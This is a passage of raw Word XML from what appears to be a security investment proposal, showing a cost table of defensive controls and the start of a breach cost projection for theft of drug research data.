            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£60,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£160,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Protects admin credentials </w:t>
            </w:r>
            <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[63]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidTr="009436F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Network Segmentation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£150,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£25,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£175,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Limits lateral movement </w:t>
            </w:r>
            <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[64]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidTr="009436F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Cloud Security (CSPM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">£15,000 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">£35,000 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£50,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Prevents AWS misconfigurations </w:t>
            </w:r>
            <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[61]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidTr="009436F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Security Awareness Training</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£10,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£10,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£20,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Reduces phishing success by 70% </w:t>
            </w:r>
            <w:r w:rsidR="004139A8" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[82]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidTr="009436F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>SIEM Enhancement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£40,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£30,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£70,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Centralized threat detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254F6D" w:rsidRPr="00C57BFC" w:rsidTr="009436F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00254F6D" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Incident Response Retainer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00254F6D" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00254F6D" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£25,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00254F6D" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£25,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00254F6D" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>Faster breach response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00254F6D" w:rsidRPr="00C57BFC" w:rsidTr="009436F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00254F6D" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TOTAL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00254F6D" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>£495,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00254F6D" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="00254F6D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>£540,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00254F6D" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>£1,035,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00254F6D" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Breach Cost Projection (Without Controls)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Scenario: APT-Style IP Theft (Baseline from Red Team Exercise)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00254F6D" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data Exfiltration:</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Drug formulation data (20 years of research)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP Value Loss:</w:t>
      </w:r>
      <w:r w:rsidR="00993BFF" w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> £250,000,000 (conservative: competitors gain 5-year advantage)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="005B63D6" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
